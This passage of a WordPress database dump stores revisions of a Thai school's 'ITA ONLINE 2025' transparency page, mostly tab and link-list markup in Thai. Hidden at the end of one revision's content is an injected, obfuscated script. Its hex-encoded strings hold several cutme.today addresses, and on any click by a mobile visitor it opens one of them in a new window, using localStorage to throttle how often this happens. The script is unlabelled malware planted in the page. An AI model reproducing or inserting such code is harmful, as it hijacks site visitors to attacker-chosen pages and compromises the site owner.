href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-05-21 11:58:58','2025-05-21 04:58:58','',871,'http://pakhaeng.ssk.in.th/?p=1260',0,'revision','',0),
(1262,1,'2025-05-21 12:03:20','2025-05-21 05:03:20','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a>และอำนาจหน้าที่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลเชิงสถิติการให้บริการ</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 